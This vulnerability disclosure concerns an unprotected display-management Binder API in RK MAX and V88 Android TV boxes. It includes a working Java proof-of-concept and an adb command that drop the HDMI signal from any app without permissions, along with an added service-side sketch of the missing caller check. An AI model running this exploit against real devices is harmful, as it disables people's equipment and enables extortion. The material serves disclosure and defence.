TVBoxBugs/RK_MAX_V88_SmartTV_Vulnerability
Vulnerability in RK MAX and V88 SmartTV box

I would like to report a security vulnerability in the RK MAX (build.id: MXC89L) and V88 (build.id: NHG47K) Smart TV boxes.

The vulnerability allows any app to drop the HDMI signal without holding any permission. An unprivileged malicious app can therefore disable the basic functionality the TV box offers, or even use it for ransomware-style extortion, e.g. dropping the signal each time a target streaming app is launched.

This vulnerability is due to the following:

The devices introduce an unprotected custom API, "switchNextDisplayInterface", in the DisplayDeviceManagement system service. It takes a single integer argument; once invoked with parameter 0, the HDMI signal is dropped. The service is reachable through ServiceManager from any app, and the service performs no caller check before switching the display.

We can exploit this API as follows:
```java
import android.os.IBinder;
import android.os.Parcel;
import java.lang.reflect.Method;

static void dropHdmiSignal() throws Exception {
    // Obtain the hidden system service via reflection; ServiceManager.getService is not in the public SDK
    Class<?> ServiceManager = Class.forName("android.os.ServiceManager");
    Method getService = ServiceManager.getMethod("getService", String.class);
    IBinder mRemote = (IBinder) getService.invoke(null, "display_device_management");
    Parcel localParcel1 = Parcel.obtain(); // request
    Parcel localParcel2 = Parcel.obtain(); // reply
    localParcel1.writeInterfaceToken("android.os.IDisplayDeviceManagementService");
    localParcel1.writeInt(0); // parameter 0 drops the HDMI signal
    mRemote.transact(7, localParcel1, localParcel2, 0); // 7 corresponds to the vulnerable API
    localParcel2.recycle();
    localParcel1.recycle();
}
```
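The following sketch of the service side of this transaction is an added example, not code from this report or from the RK MAX / V88 firmware. It shows where the missing access check belongs: the interface descriptor, service name, transaction code and method name come from the report above, while the class name, field names and the choice of a calling-UID check (rather than a vendor-defined signature permission) are assumptions made for illustration.

```java
// Added example: Binder stub for the transaction described in the report.
// Descriptor, transaction code and method name are from the report; the class,
// its fields and the UID-based gate are assumptions for illustration.
import android.os.Binder;
import android.os.Parcel;
import android.os.Process;
import android.os.RemoteException;

public class DisplayDeviceManagementStub extends Binder {
    static final String DESCRIPTOR = "android.os.IDisplayDeviceManagementService";
    static final int TRANSACTION_switchNextDisplayInterface = 7;

    // Set to false to reproduce the reported behaviour: any app may switch the output.
    static final boolean ENFORCE_CALLER = true;

    private int currentInterface = -1; // last interface requested (assumed field)

    @Override
    protected boolean onTransact(int code, Parcel data, Parcel reply, int flags)
            throws RemoteException {
        if (code == TRANSACTION_switchNextDisplayInterface) {
            // Only verifies that the caller wrote the expected interface token.
            // It is a framing check, not an access check: any app can write the token.
            data.enforceInterface(DESCRIPTOR);
            int iface = data.readInt();
            if (ENFORCE_CALLER) {
                enforceSystemCaller("switchNextDisplayInterface");
            }
            switchNextDisplayInterface(iface);
            reply.writeNoException();
            return true;
        }
        return super.onTransact(code, data, reply, flags);
    }

    // The gate the reported service lacks. Binder.getCallingUid() is the UID of the
    // process that sent the transaction, so a third-party app (UID >= 10000) is
    // rejected before the display is touched. Binder turns the SecurityException
    // into an exception in the reply parcel, which the client sees on readException().
    // Production code would normally use context.enforceCallingOrSelfPermission()
    // with a signature-level permission instead of a raw UID comparison.
    private void enforceSystemCaller(String method) {
        int uid = Binder.getCallingUid();
        if (uid != Process.SYSTEM_UID && uid != Process.myUid()) {
            throw new SecurityException(method + ": calling uid " + uid + " is not system");
        }
    }

    // Stand-in for the vendor's display switching; the real firmware drives the
    // display HAL here. Parameter 0 is the value the report says drops HDMI.
    private void switchNextDisplayInterface(int iface) {
        currentInterface = iface;
    }

    int getCurrentInterface() {
        return currentInterface;
    }
}
```

A quick way to confirm the missing check on a device is to issue the same transaction from an adb shell with `service call display_device_management 7 i32 0`; the `service` tool queries the binder for its interface descriptor and writes the token itself, so the result should match the exploit above. Note that the exploit code never calls `readException()` on the reply parcel, so on a patched device it would fail silently rather than report the SecurityException.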